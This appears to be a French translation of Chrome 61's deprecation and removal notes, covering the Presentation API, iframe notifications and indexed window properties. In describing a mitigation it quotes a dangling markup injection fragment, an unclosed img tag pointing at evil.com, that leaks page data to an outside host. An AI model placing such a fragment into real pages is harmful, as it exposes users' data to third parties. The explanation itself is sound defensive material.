Dans presque toutes les versions de Chrome, nous constatons un nombre important de mises à jour et d'améliorations du produit, de ses performances et des fonctionnalités de la plate-forme Web. Cet article décrit les fonctionnalités obsolètes et supprimées dans Chrome 61, qui est en version bêta depuis le 3 août. Cette liste est susceptible d'être modifiée à tout moment.
Sécurité et confidentialité
Bloquer les ressources dont les URL contiennent les caractères \n et <
Il existe un type de piratage appelé injection de balisage dangling, dans lequel une URL tronquée est utilisée pour envoyer des données à un point de terminaison externe. Prenons l'exemple d'une page contenant <img src='https://evil.com/?. Comme l'URL ne comporte pas de guillemet de fermeture, les navigateurs lisent jusqu'au guillemet suivant et traitent les caractères inclus comme s'il s'agissait d'une seule URL.
Chrome 61 atténue cette faille en limitant les jeux de caractères autorisés dans les attributs href et src. Plus précisément, Chrome arrête le traitement des URL lorsqu'il rencontre des caractères de nouvelle ligne (\n) et des caractères inférieurs à (<).
Les développeurs disposant d'un cas d'utilisation légitime pour les caractères de nouvelle ligne et de moins de doivent échapper ces caractères dans une URL.
Intent to Remove | Chromestatus Tracker | Bug Chromium
Abandon et suppression de l'API Presentation dans les contextes non sécurisés
Il a été constaté que, sur des origines non sécurisées, l'API Presentation peut être utilisée comme vecteur de piratage. Étant donné que les écrans ne comportent pas de barres d'adresse, l'API peut être utilisée pour falsifier du contenu. Il est également possible d'exfiltrer des données à partir d'une présentation en cours d'exécution.
Conformément à l'intention de Blink de supprimer les fonctionnalités puissantes sur les origines non sécurisées, nous prévoyons d'abandonner et de supprimer la prise en charge de l'API Presentation dans les contextes non sécurisés. À partir de Chrome 61, PresentationRequest.start() ne fonctionnera plus sur les origines non sécurisées.
Intent to Remove | Chromestatus Tracker | Bug Chromium
JavaScript
Interdire la définition de propriétés indexées sur les fenêtres
Auparavant, certains navigateurs permettaient des attributions JavaScript comme celles-ci:
window[0] = 1;
Les notes de la spécification HTML actuelle indiquent qu'il s'agit d'une violation explicite de la spécification JavaScript. Par conséquent, cette fonctionnalité est supprimée dans Chrome 61. Depuis février 2016, Firefox est déjà conforme.
Supprimer l'utilisation des notifications à partir d'iFrames non sécurisées
Les demandes d'autorisation des iFrames peuvent prêter à confusion pour les utilisateurs, car il est difficile de faire la distinction entre l'origine de la page contenante et l'origine de l'iFrame qui envoie la requête. Lorsque le champ d'application des requêtes n'est pas clair, il est difficile pour les utilisateurs de déterminer s'ils doivent accorder ou refuser l'autorisation.
L'interdiction des notifications dans les iFrames alignera également les exigences concernant l'autorisation de notification sur celles des notifications push, ce qui facilitera les choses pour les développeurs.
Les développeurs qui ont besoin de cette fonctionnalité peuvent ouvrir une nouvelle fenêtre pour demander l'autorisation de notification.